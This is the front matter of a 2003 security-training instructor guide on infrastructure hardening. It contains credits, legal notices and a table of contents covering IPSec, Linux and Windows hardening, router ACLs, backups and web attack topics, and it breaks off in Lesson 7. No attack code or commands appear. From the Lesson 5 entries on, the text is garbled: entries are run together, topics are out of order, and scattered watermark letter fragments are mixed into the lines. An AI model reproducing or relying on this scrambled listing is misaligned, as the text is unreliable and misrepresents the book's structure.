
INSTRUCTOR GUIDE


Hardening The Infrastructure (SCP)


HARDENING THE INFRASTRUCTURE (SCP)


ACKNOWLEDGEMENTS

Project Team
Curriculum Developer and Technical Writers: Warren Peterson, Shrinath Tandur and Uday O. Ali Pabrai
Copy Editors: Carin Peterson and Laura Thomas
Reviewing Editor: Christy D. Johnson
Technical Editors: Charles Nicchia and Cory Brown
Quality Assurance Analysts: Tracy Andrews, Frank Wosnick and Lance Anderson
Graphics Designer: Isolina Salgado Toner

Project Support
Development Assistance: Robert Young, David Young, Steve Richter and Pamela J. Taylor
Content Manager: Clare Dygert

NOTICES

TRADEMARK NOTICES: Element K and the Element K logo are trademarks of Element K LLC. The Security Certified Program is a registered trademark of Ascendant Learning, LLC, in the U.S. and other countries; the Security Certified Program products and services discussed or described may be trademarks of Ascendant Learning, LLC. All other product names and services used throughout this book may be common law or registered trademarks of their respective proprietors. Copyright 2003 Element K Content LLC. All rights reserved. Screenshots and IP addresses used for illustrative purposes are the property of the software proprietor. This publication, or any part thereof, may not be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, storage in an information retrieval system, or otherwise, without express written permission of Element K, 500 Canal View Boulevard, Rochester, NY 14623, (585) 240-7500, (800) 434-3466. Element K Press LLC's World Wide Web site is located at www.elementkcourseware.com. The glossary contains terms from the National Security Agency (NSA) and is reprinted with permission. Reproduction of these terms in any format without the explicit written consent of Element K or the NSA is strictly prohibited. The section that discusses IIS 5 exploits and alerts has been printed with permission from eEye Digital Security. Copyright 1998-2001 eEye Digital Security. This book conveys no rights in the software or other products about which it was written; all use or licensing of such software or other products is the responsibility of the user according to terms and conditions of the owner. Do not make illegal copies of books or software. If you believe that this book, related materials, or any other Element K materials are being reproduced or transmitted without permission, please call 1-800-478-7788.

DISCLAIMER: While Element K Press LLC takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy, and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of merchantability or fitness for a particular purpose. The names and IP addresses used in the data files for this course are those of a fictitious company. Any resemblance to current or future companies is purely coincidental. We do not believe we have used anyone's name or IP address in creating this course, but if we have, please notify us and we will change the name in the next revision of the course. Element K is an independent provider of integrated training solutions for individuals, businesses, educational institutions, and government agencies. Use of screenshots, photographs of another entity's products, or another entity's product name or service in this book is for editorial purposes only. No such use should be construed to imply sponsorship or endorsement of the book by, nor any affiliation of such entity with Element K. Some of the tools and procedures presented in this course could cause problems if used improperly or maliciously in a live network environment. These tools are not a threat in any simulated activities presented here, nor are they a threat when presented as part of instructor-led training in a closed classroom environment. However, the installation and use of the programs or procedures presented outside of a controlled environment is the sole responsibility of the end-user and may result in criminal prosecution. Element K does not endorse or recommend the illegal use of any of the scanning or hacking tools described in this course. This courseware contains links to sites on the Internet that are owned and operated by third parties (the "External Sites"). Element K is not responsible for the availability of, or the content located on or through, any External Site. Please contact Element K if you have any concerns regarding such links or External Sites.

Course Number: NH85545 (IGEE)
Course Edition: 1.1
For software version: NA

CONTENT OVERVIEW

About This Course . . . . . xix
Lesson 1: Advanced TCP/IP . . . . . 1
Lesson 2: Implementing IPSec . . . . . 77
Lesson 3: Hardening Linux Computers . . . . . 137
Lesson 4: Hardening Windows Computers . . . . . 235
Lesson 5: Routers and Access Control Lists . . . . . 321
Lesson 6: Contingency Planning . . . . . 379
Lesson 7: Security on the Internet and the WWW . . . . . 421
Lesson 8: Attack Techniques . . . . . 481
Appendix A: Hardening the Infrastructure Exam Objectives . . . . . 543
Glossary . . . . . 549
Index . . . . . 567

CONTENTS

About This Course . . . . . xix
Course Setup Information . . . . . xxiv
How To Use This Book . . . . . l

LESSON 1: ADVANCED TCP/IP

Topic 1A  TCP/IP Concepts . . . . . 3
    RFCs . . . . . 6
    The Function of IP . . . . . 7
    The Subnet Mask . . . . . 10
    Task 1A-1 Layering and Address Conversions . . . . . 12
    Routing . . . . . 12
    VLSM and CIDR . . . . . 13
    X-casting . . . . . 14
    Task 1A-2 Routers and Subnetting . . . . . 14
Topic 1B  Analyzing the Three-way Handshake . . . . . 16
    Connections . . . . . 18
    Ports . . . . . 20
    Network Monitor . . . . . 22
    Task 1B-1 Using Network Monitor . . . . . 27
    Ethereal . . . . . 28
    Task 1B-2 Installing and Starting Ethereal . . . . . 29
    Ethereal Overview . . . . . 29
    Task 1B-3 Using Ethereal . . . . . 32
    TCP Connections . . . . . 33
    Task 1B-4 Analyzing the Three-way Handshake . . . . . 33
    The Session Teardown Process . . . . . 34
    Task 1B-5 Analyzing the Session Teardown Process . . . . . 35
Topic 1C  Capturing and Identifying IP Datagrams . . . . . 35
    Task 1C-1 Capturing and Identifying IP Datagrams . . . . . 37
Topic 1D  Capturing and Identifying ICMP Messages . . . . . 38
    Task 1D-1 Capturing and Identifying ICMP Messages . . . . . 39
Topic 1E  Capturing and Identifying TCP Headers . . . . . 40
    Task 1E-1 Capturing and Identifying TCP Headers . . . . . 42
Topic 1F  Capturing and Identifying UDP Headers . . . . . 43
    Task 1F-1 Working with UDP Headers . . . . . 43
Topic 1G  Analyzing Packet Fragmentation . . . . . 44
    Task 1G-1 Analyzing Fragmentation . . . . . 45
Topic 1H  Analyzing an Entire Session . . . . . 46
    Task 1H-1 Performing a Complete ICMP Session Analysis . . . . . 46
    Continuing the Complete Session Analysis . . . . . 49
    Task 1H-2 Performing a Complete FTP Session Analysis . . . . . 50
Topic 1I  Fundamentals of IPv6 . . . . . 62
    IPv6 Addresses . . . . . 62
    Unicasting and Multicasting . . . . . 63
    IPv6 Security . . . . . 64
    Task 1I-1 Installing IPv6 . . . . . 64
    IPv6 Interfaces . . . . . 66
    Task 1I-2 Getting Another 6-over-4 Address . . . . . 68
    IPv6 Utilities . . . . . 68
    Task 1I-3 Interface Initializing . . . . . 69
    Using the ipsec6.exe Command . . . . . 69
    Task 1I-4 Using the ipsec6 Command . . . . . 69
    Using the ping6.exe Command . . . . . 70
    Task 1I-5 Using the ping6 Command . . . . . 70
    Capturing and Analyzing IPv6 Traffic . . . . . 71
    Task 1I-6 Capturing and Analyzing IPv6 Traffic . . . . . 71
    Lesson Review 1 . . . . . 72

LESSON 2: IMPLEMENTING IPSEC

Topic 2A  Internet Protocol Security . . . . . 78
    Modes . . . . . 79
    IPSec Implementation . . . . . 80
    Task 2A-1 Describing the Need for IPSec . . . . . 81
Topic 2B  IPSec Policy Management . . . . . 81
    The MMC . . . . . 81
    Task 2B-1 Examining the MMC . . . . . 82
    IPSec Policies . . . . . 83
    Task 2B-2 Identifying Default IPSec Security Policies . . . . . 83
    Saving the Customized MMC Configuration . . . . . 84
    Task 2B-3 Saving a Customized MMC . . . . . 84
    The Secure Server (Require Security) Policy . . . . . 84
    Task 2B-4 Examining Security Methods . . . . . 85
    The Rules Tab for the Secure Server (Require Security) Policy . . . . . 86
    Task 2B-5 Examining Policy Rules . . . . . 88
Topic 2C  IPSec AH Implementation . . . . . 89
    Task 2C-1 Preparing the System Setup and Configuration . . . . . 90
    Creating Custom IPSec Policies . . . . . 90
    Task 2C-2 Creating the 1_REQUEST_AH(md5)_only Policy . . . . . 93
    Editing Authentication Method Policies . . . . . 95
    Task 2C-3 Editing the 1_REQUEST_AH(md5)_only Policy . . . . . 95
    Setting Up the Computer's Response . . . . . 96
    Task 2C-4 Configuring the Policy Response . . . . . 97
    Configuring AH in Both Directions . . . . . 98
    Task 2C-5 Configuring the Second Computer . . . . . 98
    Configuring FTP . . . . . 99
    Task 2C-6 Setting Up the FTP Process . . . . . 100
    Implementing the IPSec Policy . . . . . 100
    Task 2C-7 Implementing the 1_REQUEST_AH(md5)_only Policy . . . . . 101
    Request-only Session Analysis . . . . . 101
    Task 2C-8 Analyzing the Request-only Session . . . . . 102
    Implementing a Request-and-Respond Policy . . . . . 102
    Task 2C-9 Configuring a Request-and-Respond IPSec Session . . . . . 102
    Request-and-Respond Session Analysis . . . . . 103
    Task 2C-10 Analyzing the Request-and-Respond Session . . . . . 103
    Implementing a Require IPSec Policy . . . . . 104
    Task 2C-11 Implementing the 2_REQUIRE_AH(md5)_only Policy . . . . . 104
    Mismatched AH Implementation . . . . . 105
    Task 2C-12 Attempting to Use Different IPSec Policies . . . . . 106
    Mismatched IPSec Session Analysis . . . . . 106
    Task 2C-13 Analyzing a Mismatched IPSec Policy Session . . . . . 106
    Implementing and Analyzing the Require Response Policy . . . . . 107
    Task 2C-14 Implementing and Analyzing a Require IPSec Policy Session . . . . . 107
Topic 2D  IPSec ESP Implementation . . . . . 108
    Implementing a Request ESP IPSec Policy . . . . . 108
    Task 2D-1 Creating the 3_REQUEST_ESP(des)_only IPSec Policy . . . . . 108
    Configuring the ESP IPSec Response . . . . . 110
    Task 2D-2 Creating the 3_RESPOND_ESP(des)_only IPSec Policy . . . . . 110
    ESP Request-and-Response Session Analysis . . . . . 111
    Task 2D-3 Enabling IPSec ESP Policies . . . . . 112
    Implementing an ESP IPSec Session . . . . . 113
    Task 2D-4 Configuring and Analyzing an ESP IPSec Session . . . . . 113
    ESP Analysis . . . . . 114
    Creating a Require ESP IPSec Policy . . . . . 114
    Task 2D-5 Implementing the 4_REQUIRE_ESP(des)_only IPSec Policy . . . . . 114
    Configuring a Require ESP IPSec Session . . . . . 115
    Task 2D-6 Require-and-Respond ESP Implementation and Analysis . . . . . 116
Topic 2E  Combining AH and ESP in IPSec . . . . . 117
    Task 2E-1 Creating the 5_REQUEST_AH(md5)+ESP(des) IPSec Policy and the Response Policy . . . . . 117
    Configuring the IPSec Response . . . . . 119
    Task 2E-2 Creating the 5_RESPOND_AH(md5)+ESP(des) IPSec Policy . . . . . 119
    AH and ESP IPSec Session Analysis . . . . . 120
    Task 2E-3 Configuring and Analyzing an IPSec Session Using AH and ESP . . . . . 121
    Requiring AH and ESP in an IPSec Session . . . . . 122
    Task 2E-4 Creating the 6_REQUIRE_AH(md5)+ESP(des) IPSec Policy . . . . . 123
    Using Mismatched AH and ESP IPSec Policies . . . . . 124
    Task 2E-5 Matching and Analyzing AH and ESP IPSec Policies . . . . . 124
    Configuring All the Options . . . . . 125
    Task 2E-6 Implementing the 7_REQUIRE_AH(sha)+ESP(sha+3des) Policy . . . . . 126
    Configuring the AH-and-ESP IPSec Response Policy . . . . . 127
    Task 2E-7 Implementing the 7_RESPOND_AH(sha)+ESP(sha+3des) Policy . . . . . 127
    Implementing the Full IPSec Session . . . . . 128
    Task 2E-8 Implementing and Analyzing an AH(sha) and ESP(sha+3des) IPSec Session . . . . . 129
    Using the Filter Lists . . . . . 129
    Task 2E-9 Editing Filter Lists to Explicitly Secure Traffic . . . . . 130
    Using Certificates . . . . . 132
    Task 2E-10 Using Certificates for Authentication . . . . . 132
    Disabling IPSec . . . . . 134
    Task 2E-11 Removing IPSec . . . . . 134
    Lesson Review 2 . . . . . 135

LESSON 3: HARDENING LINUX COMPUTERS

Topic 3A  Introduction to Linux Administration . . . . . 138
    Linux . . . . . 139
    Basic Navigation in Linux . . . . . 139
    Task 3A-1 Navigating in Linux . . . . . 145
    User and Group Accounts . . . . . 146
    Task 3A-2 Creating and Modifying Users and Groups . . . . . 150
    Switching User Accounts . . . . . 151
    Linux File System . . . . . 151
    Task 3A-3 Viewing File Details . . . . . 156
    Object Ownership . . . . . 156
    Webmin . . . . . 157
    Task 3A-4 Installing Webmin . . . . . 158
    System Information . . . . . 158
    Task 3A-5 Viewing System Information . . . . . 162
Topic 3B  Fundamental Linux Security . . . . . 162
    File and Directory Permissions . . . . . 162
    Task 3B-1 Creating Object Ownerships . . . . . 166
    Assigning Permissions . . . . . 167
    Task 3B-2 Assigning Permissions . . . . . 167
    Testing Assigned Permissions . . . . . 167
    Task 3B-3 Verifying Permissions . . . . . 168
    The SetUID, SetGID, and the Sticky Bit Permissions . . . . . 169
    Task 3B-4 Configuring umask Settings . . . . . 172
    Password Security . . . . . 172
    Task 3B-5 Viewing the Password Files . . . . . 176
    Managing Passwords . . . . . 176
    Task 3B-6 Managing Passwords . . . . . 177
    Pluggable Authentication Modules (PAM) . . . . . 177
    Security Updates . . . . . 182
Topic 3C  Access Control . . . . . 183
    TCP Wrappers . . . . . 183
    Task 3C-1 Controlling Access with TCP Wrappers . . . . . 187
    The xinetd Superdaemon . . . . . 187
    Task 3C-2 Managing Telnet with xinetd . . . . . 193
Topic 3D  Securing Network Services . . . . . 194
    NFS . . . . . 194
    Task 3D-1 Sharing Data with NFS . . . . . 200
    Securing NFS . . . . . 200
    Task 3D-2 Verifying Export Permissions . . . . . 202
    NIS . . . . . 202
    What is Samba? . . . . . 203
    Task 3D-3 Configuring the Samba Server . . . . . 207
Topic 3E  Final OS Hardening . . . . . 210
    Removing Services . . . . . 211
    Task 3E-1 Stopping Unneeded Services . . . . . 212
    Linux Run Levels . . . . . 213
    SSH . . . . . 213
    Task 3E-2 Configuring an SSH Server . . . . . 214
    Configuring and Using the SSH Client . . . . . 214
    Task 3E-3 Configuring an SSH Client . . . . . 215
    Tripwire . . . . . 216
    Task 3E-4 Starting Tripwire . . . . . 220
    Logging . . . . . 224
    Task 3E-5 Logging Recent Login Activity . . . . . 226
    The xferlog Log File . . . . . 227
    Web Server Log Files . . . . . 227
    The secure Log File . . . . . 227
    Using the Log Viewer . . . . . 228
    Task 3E-6 Using the Log Viewer . . . . . 228
    Securing Log Files . . . . . 229
    Bastille . . . . . 229
    Task 3E-7 Installing and Exploring Bastille . . . . . 231
    Lesson Review 3 . . . . . 232

LESSON 4: HARDENING WINDOWS COMPUTERS

Topic 4A  Windows 2000 Infrastructure Security . . . . . 236
    Active Directory Components . . . . . 237
    Windows 2000 DNS . . . . . 241
    Group Policy Components . . . . . 242
    Group Policy Implementation . . . . . 242
    Task 4A-1 Configuring a Custom MMC and GPO . . . . . 243
    Editing GPOs . . . . . 243
    Task 4A-2 Editing a GPO . . . . . 244
    Enforcing GPOs . . . . . 244
    Task 4A-3 Implementing Multiple GPOs . . . . . 245
Topic 4B  Windows 2000 Authentication . . . . . 246
    Authentication Methods . . . . . 246
    SYSKEY . . . . . 249
    The Challenge and Response . . . . . 250
    Windows 2000 Local Logon Process . . . . . 250
    Kerberos in Windows 2000 . . . . . 251
    Smart Cards in Windows 2000 . . . . . 252
    Task 4B-1 Configuring NTLMv2 Authentication . . . . . 252
Topic 4C  Windows 2000 Security Configuration Tools . . . . . 253
    The Gold Standard . . . . . 253
    User and Group Security . . . . . 253
    Restricting Logon Hours . . . . . 253
    Expiration Dates for User Accounts . . . . . 254
    Configuring Windows 2000 Groups . . . . . 254
    Locking Down the Administrator Account . . . . . 255
    Task 4C-1 Securing Administrator Account Access . . . . . 256
    Testing Administrative Access . . . . . 258
    Task 4C-2 Testing Administrative Access . . . . . 258
    Group Policies . . . . . 259
    Local Security Policy . . . . . 260
    Task 4C-3 Verifying Password Requirements . . . . . 260
    Password Recommendations . . . . . 261
    Security Templates . . . . . 262
    Task 4C-4 Analyzing Default Password Settings of Security Templates . . . . . 264
    Custom Security Templates . . . . . 264
    Task 4C-5 Creating a Custom Security Template . . . . . 264
    Security Configuration and Analysis Snap-In . . . . . 265
    Task 4C-6 Investigating the Security Configuration and Analysis Snap-In . . . . . 266
    Template Implementation . . . . . 266
    Task 4C-7 Implementing the Template . . . . . 267
    The secedit.exe Utility . . . . . 267
    Task 4C-8 Analyzing the Current Security Settings of the Local System . . . . . 267
    Analyzing and Implementing the Gold Standard . . . . . 268
    Task 4C-9 Configuring Policies to the Gold Standard . . . . . 269
    Analyzing the Gold Standard . . . . . 269
    Task 4C-10 Analyzing the Gold Standard . . . . . 270
Topic 4D  Windows 2000 Resource Security . . . . . 272
    Task 4D-1 Compromising NTFS Security . . . . . 275
    The NULL Session . . . . . 275
    Windows 2000 Printer Security . . . . . 276
    Windows 2000 Registry Security . . . . . 276
    Default Registry Configurations . . . . . 277
    Task 4D-2 Setting Registry Permissions . . . . . 278
    Registry Backup . . . . . 278
    Task 4D-3 Saving Registry Information . . . . . 278
    Blocking Access to the Registry . . . . . 279
    Task 4D-4 Blocking Registry Access . . . . . 279
    System Hardening . . . . . 280
    Task 4D-5 Removing Unneeded Subsystems . . . . . 283
Topic 4E  Windows 2000 Auditing and Logging . . . . . 283
    Object Auditing . . . . . 285
    Task 4E-1 Enabling Auditing . . . . . 286
    Registry Auditing . . . . . 286
    Task 4E-2 Logging SAM Registry Access . . . . . 287
    Managing the Event Viewer . . . . . 288
    Task 4E-3 Viewing the Registry Audit . . . . . 290
    Event IDs . . . . . 291
    Authentication Logging . . . . . 291
    Task 4E-4 Creating Events . . . . . 293
    Viewing Event Logs . . . . . 294
    Task 4E-5 Viewing Event Logs . . . . . 294
    Managing Log Files . . . . . 295
Topic 4F  Windows 2000 EFS . . . . . 296
    Task 4F-1 Encrypting Files . . . . . 298
Topic 4G  Windows 2000 Network Security . . . . . 298
    Task 4G-1 Investigating Printer Spooler Security . . . . . 299
    Communicating without NetBIOS . . . . . 301
    Task 4G-2 Communication without NetBIOS . . . . . 301
    NAT and ICS . . . . . 303
    Remote Access . . . . . 303
    RADIUS Implementation in the Classroom . . . . . 304
    Task 4G-3 Physically Preparing for RADIUS Implementation . . . . . 304
    Configuring the Dialup Server . . . . . 305
    Task 4G-4 Configuring the Dialup Server Configuration . . . . . 305
    Configuring the Dialup Client . . . . . 307
    Task 4G-5 Configuring the Dialup Client . . . . . 307
    Creating Users on the RADIUS Server . . . . . 308
    Task 4G-6 Creating Users on the RADIUS Server . . . . . 308
    IAS . . . . . 309
    Task 4G-7 Installing IAS . . . . . 309
    RIP . . . . . 310
    Task 4G-8 Installing RIP . . . . . 310
    Configuring the Dialup Server as a RADIUS Client . . . . . 311
    Task 4G-9 Configuring the Dialup Server as a RADIUS Client . . . . . 311
    Testing the Dialup Client . . . . . 312
    Task 4G-10 Testing the Dialup Client . . . . . 312
    Bringing Back the Network . . . . . 313
    Task 4G-11 Reconfiguring the Network . . . . . 313
    Hardening TCP/IP . . . . . 314
    Task 4G-12 Configuring TCP/IP in the Registry . . . . . 315
    TCP/IP Filtering . . . . . 316
    Task 4G-13 Configuring Port and Protocol Filtering . . . . . 317
    Lesson Review 4 . . . . . 318

LESSON 5: ROUTERS AND ACCESS CONTROL LISTS

Topic 5A

CONTENTS

Topic 5B

Routing Principles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .334 The ARP Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 334 LAN-to-LAN Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 337 LAN-to-WAN Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338 Task 5B-1 Performing IP and MAC Analysis . . . . . . . . . . . . . . . . . . . . . 339 The Routing Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340 Static and Dynamic Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 342 Comparing Routed Protocols and Routing Protocols . . . . . . . . . . . . . . 345 The Routing Protocols. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346 RIP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350 Task 5B-2 Viewing a RIP Capture . . . . . . . . . . . . . . . . . . . . . . . . . . . 351 RIPv2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 351 Task 5B-3 Viewing a RIPv2 Capture . . . . . . . . . . . . . . . . . . . . . . . . . . 353

st

In

DO

ru ct

NO

Fundamental Cisco Security. . . . . . . . . . . . . . . . . . . . . . . . . . .322 Authentication and Authorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325 Configuring Access Passwords. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325 Task 5A-1 Configuring Passwords . . . . . . . . . . . . . . . . . . . . . . . . . . . 327 Creating User Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327 Implementing Banners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 327 Implementing Cisco Banners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 328 Task 5A-2 Configuring Login Banners . . . . . . . . . . . . . . . . . . . . . . . . 329 SSH Overview. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330 Router Configuration to use SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330 Task 5A-3 Configuring SSH on a Router . . . . . . . . . . . . . . . . . . . . . . . 332 Task 5A-4 Configuring the SSH Client . . . . . . . . . . . . . . . . . . . . . . . . 334

or

AT
Contents

E
xi

iti

on

CONTENTS

Topic 5C

Topic 5E Topic 5F

Implementing Access Control Lists . . . . . . . . . . . . . . . . . . . .363 Defending Against Attacks with ACLs. . . . . . . . . . . . . . . . . . . . . . . . . . 367 Task 5E-1 Creating Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . 369

or
DO NO

ru ct
Topic 6A

Continuity and Recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . .380 Planning for Backups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380 Disasters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380 Security Policies and Their Impact on the Business. . . . . . . . . . . . . . . 382

In

xii

Hardening The Infrastructure (SCP)

st

Topic 6B

Developing the Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .384 Requirements and Goals of a Contingency Plan . . . . . . . . . . . . . . . . . . 384 Creating the Contingency Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385 Testing the Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385 The Technologies of Staying On . . . . . . . . . . . . . . . . . . . . . . .387 Personal UPS Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387 Task 6C-1 Configuring a UPS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 388 Full Server Rack UPS Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389 Building Generators. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389

Topic 6C

DU

LESSON 6: CONTINGENCY PLANNING

PL

Logging Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .369 Configuring Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371 Task 5F-1 Configuring Buffered Logging . . . . . . . . . . . . . . . . . . . . . . 373 ACL Logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374 Task 5F-2 Configuring Anti-spoofing Logging . . . . . . . . . . . . . . . . . . . 376 Lesson Review 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377

Ed

Creating Access Control Lists . . . . . . . . . . . . . . . . . . . . . . . . .359 Access Control List Operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360 The Access List Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360 The Wildcard Mask . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361 Task 5D-1 Creating Wildcard Masks . . . . . . . . . . . . . . . . . . . . . . . . . . 363

IC

AT

iti

Topic 5D

on

Removing Protocols and Services . . . . . . . . . . . . . . . . . . . . . .354 CDP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354 Task 5C-1 Turning Off CDP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355 ICMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355 Task 5C-2 Hardening ICMP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356 Source Routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356 Small Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357 Finger . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357 Remaining Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358 Task 5C-3 Removing Unneeded Services . . . . . . . . . . . . . . . . . . . . . . . 359

Topic 6D

Backing Up the Operating Systems. . . . . . . . . . . . . . . . . . . . .391 Backup Strategies for Windows Computers. . . . . . . . . . . . . . . . . . . . . . 398 Task 6D-1 Creating a Folder Structure . . . . . . . . . . . . . . . . . . . . . . . . 399 Initiating the Backup Process. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399 Task 6D-2 Initiating a Normal Backup . . . . . . . . . . . . . . . . . . . . . . . . 400 Viewing the Results of the Backup Process . . . . . . . . . . . . . . . . . . . . . 400 Task 6D-3 Viewing the State of the Archive Attribute Bit . . . . . . . . . . . 401 Restoring a File from Normal Backup . . . . . . . . . . . . . . . . . . . . . . . . . . 401 Task 6D-4 Restoring from a Backup . . . . . . . . . . . . . . . . . . . . . . . . . . 401 Understanding Differential Backup . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402 Task 6D-5 Preparing to Start a Differential Backup Sequence . . . . . . . . 402 Backing Up Your Weekends Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402 Task 6D-6 Initiating a Differential Backup Sequence . . . . . . . . . . . . . . 403 Adding Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 403 Task 6D-7 Creating Additional Data . . . . . . . . . . . . . . . . . . . . . . . . . . 403 Backing Up Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404 Task 6D-8 Continuing the Differential Backup Sequence . . . . . . . . . . . . 404 Adding More Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405 Task 6D-9 Adding Data After a Differential Backup . . . . . . . . . . . . . . . 405 Backing Up More Data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405 Task 6D-10 Differentially Backing Up More Data . . . . . . . . . . . . . . . . . . 405 Accidentally Deleting Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
406 Task 6D-11 Destroying Backed-up Data . . . . . . . . . . . . . . . . . . . . . . . . 406 Restoring Data from a Differential Backup . . . . . . . . . . . . . . . . . . . . . . 406 Task 6D-12 Restoring Files from a Differential Backup . . . . . . . . . . . . . . 407 Optional Tasks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408 Understanding Incremental Backup . . . . . . . . . . . . . . . . . . . . . . . . . . . 408 Task 6D-13 Preparing to Start an Incremental Backup Sequence . . . . . . . 408 Backing up Your Weekends Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409 Task 6D-14 Initiating an Incremental Backup Sequence . . . . . . . . . . . . . 409 Adding Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409 Task 6D-15 Creating Additional Data . . . . . . . . . . . . . . . . . . . . . . . . . . 410 Backing Up Data During the Week . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410 Task 6D-16 Continuing the Incremental Backup Sequence . . . . . . . . . . . 410 Adding More Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411 Task 6D-17 Adding Data After an Incremental Backup . . . . . . . . . . . . . . 411 Backing Up More Data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411 Task 6D-18 Incrementally Backing Up More Data. . . . . . . . . . . . . . . . . . 412 Accidentally Corrupting Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412 Task 6D-19 Corrupting Backed-up Data . . . . . . . . . . . . . . . . . . . . . . . . 412 Restoring Data from an Incremental Backup . . . . . . . . . . . . . . . . . . . . 413 Task 6D-20 Restoring an Incrementally Backed-up File. . . . . . . . . . . . . . 413 Performing an Incomplete Restore from Incremental Backup . . . . . . . 413 Task 6D-21 Incompletely Restoring from Incremental Backup . . . . . . . . . 414 Analyzing the Incremental Restore. . 
. . . . . . . . . . . . . . . . . . . . . . . . . . 415 Task 6D-22 Completely Restoring from Incremental Backup . . . . . . . . . . 415

CONTENTS

Ed
T DU PL IC

st

In

DO

ru ct

NO

or

AT
Contents

E
xiii

iti

on

CONTENTS

Backup Options for Linux Computers . . . . . . . . . . . . . . . . . . . . . . . . . . 415 Task 6D-23 Using the tar Command for Incremental Backups . . . . . . . . . 417 Backup Strategies for Cisco Routers . . . . . . . . . . . . . . . . . . . . . . . . . . . 417 Task 6D-24 Backing Up Cisco Router Configurations . . . . . . . . . . . . . . . 418 Lesson Review 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419

LESSON 7: SECURITY ON THE INTERNET AND THE WWW


Topic 7A

or
DO NO

ru ct In
xiv Hardening The Infrastructure (SCP)

st

Topic 7C

Describing Web Hacking Techniques. . . . . . . . . . . . . . . . . . . .441 Vulnerability Scanning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441 Incorrect Web Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 442 Buffer Overflows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443

DU

PL

IC

AT

Topic 7B

